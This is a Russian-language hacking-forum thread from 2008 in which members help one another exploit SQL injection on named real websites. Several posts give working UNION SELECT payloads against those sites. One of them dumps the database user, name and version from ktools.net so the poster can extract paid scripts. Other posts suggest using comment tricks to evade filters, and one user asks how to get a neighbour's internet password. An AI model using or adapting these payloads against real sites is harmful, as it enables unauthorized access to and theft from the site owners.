HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.09.2008, 15:36
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
Сообщение от DJ ][akep  
Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/* 
но так нехочет:
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 
Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов

Цитата:
Сообщение от SIdoy  
Цитата:
Сообщение от IND1G0
http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*
Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.

Цитата:
Сообщение от luz3r  
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
Надо чтобы значение не существовало
__________________

Последний раз редактировалось +toxa+; 25.09.2008 в 16:24..
 
Ответить с цитированием

  #2  
Старый 25.09.2008, 16:33
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
С нами: 9586096

Репутация: 850
По умолчанию

Цитата:
Надо чтобы значение не существовало
я ето имел в виду.
 
Ответить с цитированием

  #3  
Старый 25.09.2008, 23:34
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от +toxa+  
Бред. Значение из переменной подставляется в limit,
1значение переменной вообще может не фигурировать в запросе, что общего между:
Цитата:
страница id=0 union select 1/*
и
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
2 и это не обязательно лимит, например where lala=1,-20,10


:add sql inj здесь не прокатит
 
Ответить с цитированием

  #4  
Старый 25.09.2008, 13:51
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию

у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
 
Ответить с цитированием

  #5  
Старый 25.09.2008, 15:02
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
С нами: 9586096

Репутация: 850
По умолчанию

Цитата:
Сообщение от USAkid  
у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
 
Ответить с цитированием

  #6  
Старый 25.09.2008, 19:59
Gema
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами: 9286645

Репутация: 73
По умолчанию

помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
 
Ответить с цитированием

  #7  
Старый 25.09.2008, 20:19
777DEMYAN777
Познающий
Регистрация: 31.05.2008
Сообщений: 58
С нами: 9446056

Репутация: 27
По умолчанию

Как узнать пасс на инет у соседа? у нас с ним сетка!!!
 
Ответить с цитированием

  #8  
Старый 25.09.2008, 22:37
F1shka
Banned
Регистрация: 10.04.2008
Сообщений: 618
С нами: 9518786

Репутация: 942


По умолчанию

Цитата:
Сообщение от 777demyan777  
Как узнать пасс на инет у соседа? у нас с ним сетка!!!
По конкретней сударь!
 
Ответить с цитированием

  #9  
Старый 26.09.2008, 11:01
Gema
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами: 9286645

Репутация: 73
По умолчанию

Цитата:
Сообщение от Gema  
помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
У кого-нибудь есть соображения?
 
Ответить с цитированием

  #10  
Старый 26.09.2008, 11:56
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от Gema  
У кого-нибудь есть соображения?
Код:
http://ktools.net/news_detail.php?nid=1+union+select+1,2,concat_ws(0x40,user(),database(),version()),4,5--
Бруть таблицы ..SIPT'ом например
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.